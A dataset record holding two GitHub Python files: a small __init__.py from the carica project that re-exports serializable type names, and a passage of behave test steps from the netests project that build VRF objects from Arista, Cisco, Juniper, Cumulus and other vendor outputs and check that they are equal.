2022-01-16T17:39:34.000Z
|
src/carica/interface/__init__.py
|
Trimatix/carica
|
074be16bdf50541eb3ba92ca42d0ad901cc51bd0
|
[
"Apache-2.0"
] | null | null | null |
from .Serializable import ISerializable, SerializableType, \
PrimativeType, primativeTypes, primativeTypesTuple, serializableTypes, \
serializableTypesTuple, primativeTypesTuple
| 77.666667
| 100
| 0.665236
| 11
| 233
| 14.090909
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.291845
| 233
| 3
| 101
| 77.666667
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
a0b70a82fc4613563797738f8c6808bdb4074792
| 55,367
|
py
|
Python
|
tests/features/steps/vrf_tests.py
|
Netests/netests
|
1a48bda461761c4ec854d6fa0c38629049009a4a
|
[
"MIT"
] | 14
|
2020-06-08T07:34:59.000Z
|
2022-03-14T08:52:03.000Z
|
tests/features/steps/vrf_tests.py
|
Netests/netests
|
1a48bda461761c4ec854d6fa0c38629049009a4a
|
[
"MIT"
] | null | null | null |
tests/features/steps/vrf_tests.py
|
Netests/netests
|
1a48bda461761c4ec854d6fa0c38629049009a4a
|
[
"MIT"
] | 3
|
2020-06-19T03:57:05.000Z
|
2020-06-22T22:46:42.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
import yaml
import textfsm
from netests.protocols.vrf import VRF, ListVRF
from netests.comparators.vrf_compare import _compare_vrf
from netests.converters.vrf.arista.api import _arista_vrf_api_converter
from netests.converters.vrf.arista.nc import _arista_vrf_nc_converter
from netests.converters.vrf.arista.ssh import _arista_vrf_ssh_converter
from netests.converters.vrf.cumulus.api import _cumulus_vrf_api_converter
from netests.converters.vrf.cumulus.ssh import _cumulus_vrf_ssh_converter
from netests.converters.vrf.extreme_vsp.ssh import _extreme_vsp_vrf_ssh_converter
from netests.converters.vrf.ios.api import _ios_vrf_api_converter
from netests.converters.vrf.ios.nc import _ios_vrf_nc_converter
from netests.converters.vrf.ios.ssh import _ios_vrf_ssh_converter
from netests.converters.vrf.iosxr.ssh import _iosxr_vrf_ssh_converter
from netests.converters.vrf.iosxr.nc import _iosxr_vrf_nc_converter
from netests.converters.vrf.juniper.api import _juniper_vrf_api_converter
from netests.converters.vrf.juniper.nc import _juniper_vrf_nc_converter
from netests.converters.vrf.juniper.ssh import _juniper_vrf_ssh_converter
from netests.converters.vrf.napalm.converter import _napalm_vrf_converter
from netests.converters.vrf.nxos.nc import _nxos_vrf_nc_converter
from netests.converters.vrf.nxos.rc import _nxos_vrf_rc_converter
from netests.converters.vrf.nxos.ssh import _nxos_vrf_ssh_converter
from netests.constants import NOT_SET, FEATURES_SRC_PATH, VRF_DATA_KEY
from netests.tools.file import open_file, open_txt_file, open_json_file, open_txt_file_as_bytes
@given(u'A network protocols named VRF defined in netests/protocols/vrf.py')
def step_impl(context):
context.test_not_implemented = list()
@given(u'I create a VRF object equals to Arista manually named o0001')
def step_impl(context):
context.o0001 = ListVRF(
vrf_lst=list()
)
context.o0001.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id=NOT_SET,
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0001.vrf_lst.append(
VRF(
vrf_name="CUSTOMER_NETESTS",
vrf_id=NOT_SET,
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0001.vrf_lst.append(
VRF(
vrf_name="CUSTOMER_WEJOB",
vrf_id=NOT_SET,
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd="1111:11",
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a Arista API output named o0002')
def step_impl(context):
context.o0002 = _arista_vrf_api_converter(
hostname="leaf03",
cmd_output=open_json_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/arista/api/"
"arista_api_get_vrf_many_vrf.json"
)
)
)
@given(u'I create a VRF object from a Arista Netconf named o0003')
def step_impl(context):
context.o0003 = _arista_vrf_nc_converter(
hostname="leaf03",
cmd_output=open_json_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/arista/netconf/"
"arista_nc_get_vrf_many_vrf.json"
)
)
)
@given(u'I create a VRF object from a Arista SSH output named o0004')
def step_impl(context):
context.o0004 = _arista_vrf_ssh_converter(
hostname="leaf03",
cmd_output=open_json_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/arista/ssh/"
"arista_cli_get_vrf_many_vrf.json"
)
)
)
@given(u'I create a VRF object equals to Arista no config manually named o0011')
def step_impl(context):
context.o0011 = ListVRF(
vrf_lst=list()
)
context.o0011.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id=NOT_SET,
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a Arista no config API output named o0012')
def step_impl(context):
context.o0012 = _arista_vrf_api_converter(
hostname="leaf03",
cmd_output=open_json_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/arista/api/"
"arista_api_get_vrf_no_config.json"
)
)
)
@given(u'I create a VRF object from a Arista no config Netconf named o0013')
def step_impl(context):
context.o0013 = _arista_vrf_nc_converter(
hostname="leaf03",
cmd_output=open_json_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/arista/netconf/"
"arista_nc_get_vrf_no_config.json"
)
)
)
@given(u'I create a VRF object from a Arista no config SSH output named o0014')
def step_impl(context):
context.o0014 = _arista_vrf_ssh_converter(
hostname="leaf03",
cmd_output=open_json_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/arista/ssh/"
"arista_cli_get_vrf_no_config.json"
)
)
)
@given(u'I create a VRF object equals to Arista one vrf manually named o0021')
def step_impl(context):
context.o0021 = ListVRF(
vrf_lst=list()
)
context.o0021.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id=NOT_SET,
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0021.vrf_lst.append(
VRF(
vrf_name="CUSTOMER_NETESTS",
vrf_id=NOT_SET,
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a Arista one vrf API output named o0022')
def step_impl(context):
context.o0022 = _arista_vrf_api_converter(
hostname="leaf03",
cmd_output=open_json_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/arista/api/"
"arista_api_get_vrf_one_vrf.json"
)
)
)
@given(u'I create a VRF object from a Arista one vrf Netconf named o0023')
def step_impl(context):
context.o0023 = _arista_vrf_nc_converter(
hostname="leaf03",
cmd_output=open_json_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/arista/netconf/"
"arista_nc_get_vrf_one_vrf.json"
)
)
)
@given(u'I create a VRF object from a Arista one vrf SSH output named o0024')
def step_impl(context):
context.o0024 = _arista_vrf_ssh_converter(
hostname="leaf03",
cmd_output=open_json_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/arista/ssh/"
"arista_cli_get_vrf_one_vrf.json"
)
)
)
@given(u'I create a VRF object equals to Cumulus manually named o0101')
def step_impl(context):
context.o0101 = ListVRF(
vrf_lst=list()
)
context.o0101.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id="1000",
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0101.vrf_lst.append(
VRF(
vrf_name="mgmt",
vrf_id="1001",
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a Cumulus API output named o0102')
def step_impl(context):
context.o0102 = _cumulus_vrf_api_converter(
hostname="leaf01",
cmd_output=open_txt_file_as_bytes(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/cumulus/api/"
"cumulus_http_show_vrf.txt"
)
)
)
@given(u'I create a VRF object from a Cumulus Netconf named o0103')
def step_impl(context):
print("Cumulus Facts with Netconf not possible -> Not tested")
@given(u'I create a VRF object from a Cumulus SSH output named o0104')
def step_impl(context):
context.o0104 = _cumulus_vrf_ssh_converter(
hostname="leaf01",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/cumulus/ssh/"
"cumulus_net_show_vrf.txt"
)
)
)
@given(u'I create a VRF object equals to Extreme VSP manually named o0201')
def step_impl(context):
context.o0201 = ListVRF(
vrf_lst=list()
)
context.o0201.vrf_lst.append(
VRF(
vrf_name="GlobalRouter",
vrf_id="0",
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0201.vrf_lst.append(
VRF(
vrf_name="mgmt_vrf",
vrf_id="1",
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0201.vrf_lst.append(
VRF(
vrf_name="MgmtRouter",
vrf_id="512",
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a Extreme VSP API output named o0204')
def step_impl(context):
print("Extreme VSP VRF with API has no endpoint -> Not tested")
@given(u'I create a VRF object from a Extreme VSP Netconf output named o0204')
def step_impl(context):
print("Extreme VSP VRF with Netconf not possible -> Not tested")
@given(u'I create a VRF object from a Extreme VSP SSH output named o0204')
def step_impl(context):
context.o0204 = _extreme_vsp_vrf_ssh_converter(
hostname="spine02",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/extreme_vsp/ssh/"
"extreme_vsp_show_ip_vrf.txt"
)
)
)
@given(u'I create a VRF object equals to IOS manually named o0301')
def step_impl(context):
context.o0301 = ListVRF(
vrf_lst=list()
)
context.o0301.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id="0",
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0301.vrf_lst.append(
VRF(
vrf_name="MGMT_VRF",
vrf_id="1",
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd='65000:999',
rt_imp='65100:9',
rt_exp='65100:9',
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0301.vrf_lst.append(
VRF(
vrf_name="SECURE_ZONE",
vrf_id="2",
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a IOS API output named o0302')
def step_impl(context):
context.o0302 = _ios_vrf_api_converter(
hostname="leaf05",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/ios/api/"
"cisco_ios_api_get_vrf.xml"
)
)
)
@given(u'I create a VRF object from a IOS Netconf named o0303')
def step_impl(context):
context.o0303 = _ios_vrf_nc_converter(
hostname="leaf05",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/ios/netconf/"
"cisco_ios_nc_get_vrf.xml"
)
)
)
@given(u'I create a VRF object from a IOS SSH named o0304')
def step_impl(context):
context.o0304 = _ios_vrf_ssh_converter(
hostname="leaf05",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/ios/ssh/"
"cisco_ios_show_ip_vrf_detail.txt"
)
)
)
@given(u'I create a VRF object equals to IOS no config manually named o0311')
def step_impl(context):
context.o0311 = ListVRF(
vrf_lst=list()
)
context.o0311.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id=NOT_SET,
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a IOS no config API named o0312')
def step_impl(context):
context.o0312 = _ios_vrf_api_converter(
hostname="leaf05",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/ios/api/"
"cisco_ios_api_get_vrf_no_config.xml"
)
)
)
@given(u'I create a VRF object from a IOS no config Netconf named o0313')
def step_impl(context):
context.o0313 = _ios_vrf_nc_converter(
hostname="leaf05",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/ios/netconf/"
"cisco_ios_nc_get_vrf_no_config.xml"
)
)
)
@given(u'I create a VRF object from a IOS no config SSH named o0314')
def step_impl(context):
context.o0314 = _ios_vrf_ssh_converter(
hostname="leaf05",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/ios/ssh/"
"cisco_ios_ssh_get_vrf_no_config.txt"
)
)
)
@given(u'I create a VRF object equals to IOS one vrf manually named o0321')
def step_impl(context):
context.o0321 = ListVRF(
vrf_lst=list()
)
context.o0321.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id=NOT_SET,
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0321.vrf_lst.append(
VRF(
vrf_name='CUSTOMER_001',
vrf_id=NOT_SET,
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd='65123:123',
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a IOS one vrf API named o0322')
def step_impl(context):
context.o0322 = _ios_vrf_api_converter(
hostname="leaf05",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/ios/api/"
"cisco_ios_api_get_vrf_only_one.xml"
)
)
)
@given(u'I create a VRF object from a IOS one vrf Netconf named o0323')
def step_impl(context):
context.o0323 = _ios_vrf_nc_converter(
hostname="leaf05",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/ios/netconf/"
"cisco_ios_nc_get_vrf_only_one.xml"
)
)
)
@given(u'I create a VRF object from a IOS one vrf SSH named o0324')
def step_impl(context):
context.o0324 = _ios_vrf_ssh_converter(
hostname="leaf05",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/ios/ssh/"
"cisco_ios_ssh_get_vrf_only_one.txt"
)
)
)
@given(u'I create a VRF object equals to IOS many manually named o0331')
def step_impl(context):
context.o0331 = ListVRF(
vrf_lst=list()
)
context.o0331.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id=NOT_SET,
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0331.vrf_lst.append(
VRF(
vrf_name='CUSTOMER_001',
vrf_id='1',
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd='65123:123',
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0331.vrf_lst.append(
VRF(
vrf_name='CUSTOMER_002',
vrf_id='2',
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd='65123:123',
rt_imp='65222:2',
rt_exp='65222:1',
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a IOS many API named o0332')
def step_impl(context):
context.o0332 = _ios_vrf_api_converter(
hostname="leaf05",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/ios/api/"
"cisco_ios_api_get_vrf_many.xml"
)
)
)
@given(u'I create a VRF object from a IOS many Netconf named o0333')
def step_impl(context):
context.o0333 = _ios_vrf_nc_converter(
hostname="leaf05",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/ios/netconf/"
"cisco_ios_nc_get_vrf_many.xml"
)
)
)
@given(u'I create a VRF object from a IOS many SSH named o0334')
def step_impl(context):
context.o0334 = _ios_vrf_ssh_converter(
hostname="leaf05",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/ios/ssh/"
"cisco_ios_ssh_get_vrf_many.txt"
)
)
)
@given(u'I create a VRF object equals to IOS-XR manually named o0401')
def step_impl(context):
context.o0401 = ListVRF(
vrf_lst=list()
)
context.o0401.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id=NOT_SET,
vrf_type="Regular",
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0401.vrf_lst.append(
VRF(
vrf_name="EXTERNAL_PEERING",
vrf_id=NOT_SET,
vrf_type="Regular",
l3_vni=NOT_SET,
rd="65000:100",
rt_imp="65000:1",
rt_exp="65000:1",
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0401.vrf_lst.append(
VRF(
vrf_name="MGMT_VRF",
vrf_id=NOT_SET,
vrf_type="Regular",
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a IOS-XR API output named o0402')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'I create a VRF object from a IOS-XR Netconf output named o403')
def step_impl(context):
config = dict()
config['VRF'] = open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/"
"cisco_iosxr_nc_get_vrf.xml"
)
)
config['BGP'] = open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/"
"cisco_iosxr_nc_get_bgp.xml"
)
)
context.o403 = _iosxr_vrf_nc_converter(
hostname="spine03",
cmd_output=config
)
@given(u'I create a VRF object from a IOS-XR SSH output named o0404')
def step_impl(context):
context.o0404 = _iosxr_vrf_ssh_converter(
hostname="spine03",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/ssh/"
"cisco_iosxr_show_vrf_all_detail.txt"
)
)
)
@given(u'I create a VRF object equals IOS-XR multi manually output named o0405')
def step_impl(context):
context.o0405 = ListVRF(
vrf_lst=list()
)
context.o0405.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id=NOT_SET,
vrf_type="Regular",
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0405.vrf_lst.append(
VRF(
vrf_name="EXTERNAL_PEERING",
vrf_id=NOT_SET,
vrf_type="Regular",
l3_vni=NOT_SET,
rd="65000:100",
rt_imp="65000:1",
rt_exp="65000:1",
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0405.vrf_lst.append(
VRF(
vrf_name="MGMT_VRF",
vrf_id=NOT_SET,
vrf_type="Regular",
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0405.vrf_lst.append(
VRF(
vrf_name="INTERNAL_PEERING",
vrf_id=NOT_SET,
vrf_type="Regular",
l3_vni=NOT_SET,
rd="65000:200",
rt_imp="65000:2",
rt_exp="65000:2",
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a IOS-XR multi Netconf output named o0406')
def step_impl(context):
config = dict()
config['VRF'] = open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/"
"cisco_iosxr_nc_get_vrf2.xml"
)
)
config['BGP'] = open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/"
"cisco_iosxr_nc_get_bgp2.xml"
)
)
context.o0406 = _iosxr_vrf_nc_converter(
hostname="spine03",
cmd_output=config
)
@given(u'I create a VRF object equals to IOS-XR no config manually named o0411')
def step_impl(context):
context.o0411 = ListVRF(
vrf_lst=list()
)
context.o0411.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id=NOT_SET,
vrf_type="Regular",
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a IOS-XR no config API named o0412')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'I create a VRF object from a IOS-XR no config Netconf named o0413')
def step_impl(context):
config = dict()
config['VRF'] = open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/"
"cisco_iosxr_nc_get_vrf_no_config.xml"
)
)
config['BGP'] = open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/"
"cisco_iosxr_nc_get_bgp_no_config.xml"
)
)
context.o0413 = _iosxr_vrf_nc_converter(
hostname="spine03",
cmd_output=config
)
@given(u'I create a VRF object from a IOS-XR no config SSH named o0414')
def step_impl(context):
context.o0414 = _iosxr_vrf_ssh_converter(
hostname="spine03",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/ssh/"
"cisco_iosxr_show_vrf_all_detail_no_config.txt"
)
)
)
@given(u'I create a VRF object equals to IOS-XR one vrf manually named o0421')
def step_impl(context):
context.o0421 = ListVRF(
vrf_lst=list()
)
context.o0421.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id=NOT_SET,
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0421.vrf_lst.append(
VRF(
vrf_name="CUSTOMER_NETESTS",
vrf_id=NOT_SET,
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a IOS-XR one vrf API named o0422')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'I create a VRF object from a IOS-XR one vrf Netconf named o0423')
def step_impl(context):
config = dict()
config['VRF'] = open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/"
"cisco_iosxr_nc_get_vrf_one_vrf.xml"
)
)
config['BGP'] = open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/netconf/"
"cisco_iosxr_nc_get_bgp_one_vrf.xml"
)
)
context.o0423 = _iosxr_vrf_nc_converter(
hostname="spine03",
cmd_output=config
)
@given(u'I create a VRF object from a IOS-XR one vrf SSH named o0424')
def step_impl(context):
context.o0424 = _iosxr_vrf_ssh_converter(
hostname="spine03",
cmd_output=open_txt_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/iosxr/ssh/"
"cisco_iosxr_show_vrf_all_detail_one_vrf.txt"
)
)
)
@given(u'I create a VRF object equals to Juniper manually named o0501')
def step_impl(context):
context.o0501 = ListVRF(
vrf_lst=list()
)
context.o0501.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id="100.123.1.0",
vrf_type="forwarding",
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0501.vrf_lst.append(
VRF(
vrf_name="CUSTOMER_001",
vrf_id="7.7.7.7",
vrf_type="vrf",
l3_vni=NOT_SET,
rd="65333:333",
rt_imp="__vrf-import-CUSTOMER_001-internal__",
rt_exp="__vrf-export-CUSTOMER_001-internal__",
imp_targ="65333:333",
exp_targ="65333:333"
)
)
context.o0501.vrf_lst.append(
VRF(
vrf_name="mgmt_junos",
vrf_id="0.0.0.0",
vrf_type="forwarding",
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a Juniper API output named o0502')
def step_impl(context):
context.o0502 = _juniper_vrf_api_converter(
hostname="leaf04",
cmd_output=open_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/juniper/api/"
"juniper_api_get_vrf.xml"
)
)
)
@given(u'I create a VRF object from a Juniper Netconf output named o0503')
def step_impl(context):
context.o0503 = _juniper_vrf_nc_converter(
hostname="leaf04",
cmd_output=open_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/juniper/netconf/"
"get_instance_information_details.xml"
)
)
)
@given(u'I create a VRF object from a Juniper SSH output named o0504')
def step_impl(context):
context.o0504 = _juniper_vrf_ssh_converter(
hostname="leaf04",
cmd_output=open_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/juniper/ssh/"
"juniper_show_route_instance_detail.json"
)
)
)
@given(u'I create a VRF object equals to NAPALM manually named o0601')
def step_impl(context):
context.o0601 = ListVRF(
vrf_lst=list()
)
context.o0601.vrf_lst.append(
VRF(
vrf_name="MGMT_VRF",
vrf_id=NOT_SET,
vrf_type="L3VRF",
l3_vni=NOT_SET,
rd="65000:999",
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0601.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id=NOT_SET,
vrf_type="DEFAULT_INSTANCE",
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a NAPALM output named o0602')
def step_impl(context):
context.o0602 = _napalm_vrf_converter(
hostname="leaf02",
cmd_output=open_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/napalm/napalm_get_vrf.json"
)
)
)
@given(u'I create a VRF object equals to NXOS manually named o0701')
def step_impl(context):
context.o0701 = ListVRF(
vrf_lst=list()
)
context.o0701.vrf_lst.append(
VRF(
vrf_name="CUSTOMER_001",
vrf_id="4",
vrf_type=NOT_SET,
l3_vni="1000",
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0701.vrf_lst.append(
VRF(
vrf_name="INTERNAL_PEERING",
vrf_id="3",
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd='65432:222',
rt_imp='65432:22',
rt_exp='65432:22',
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0701.vrf_lst.append(
VRF(
vrf_name="management",
vrf_id="2",
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o0701.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id="1",
vrf_type=NOT_SET,
l3_vni=NOT_SET,
rd=NOT_SET,
rt_imp=NOT_SET,
rt_exp=NOT_SET,
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
@given(u'I create a VRF object from a NXOS API output named o0702')
def step_impl(context):
context.o0702 = _nxos_vrf_rc_converter(
hostname="leaf02",
cmd_output=open_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/nxos/api/"
"cisco_nxos_api_get_vrf.xml"
)
)
)
@given(u'I create a VRF object from a NXOS Netconf output named o0703')
def step_impl(context):
context.o0703 = _nxos_vrf_nc_converter(
hostname="leaf02",
cmd_output=open_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/nxos/netconf/"
"cisco_nxos_nc_get_vrf.xml"
)
)
)
@given(u'I create a VRF object from a NXOS SSH output named o0704')
def step_impl(context):
context.o0704 = _nxos_vrf_ssh_converter(
hostname="leaf02",
cmd_output=open_json_file(
path=(
f"{FEATURES_SRC_PATH}outputs/vrf/nxos/ssh/"
"cisco_nxos_show_vrf_all_detail.json"
)
)
)
@given(u'VRF o0001 should be equal to o0002')
def step_impl(context):
assert context.o0001 == context.o0002
@given(u'VRF o0001 should be equal to o0003')
def step_impl(context):
assert context.o0001 == context.o0003
@given(u'VRF o0001 should be equal to o0004')
def step_impl(context):
assert context.o0001 == context.o0004
@given(u'VRF o0002 should be equal to o0003')
def step_impl(context):
assert context.o0002 == context.o0003
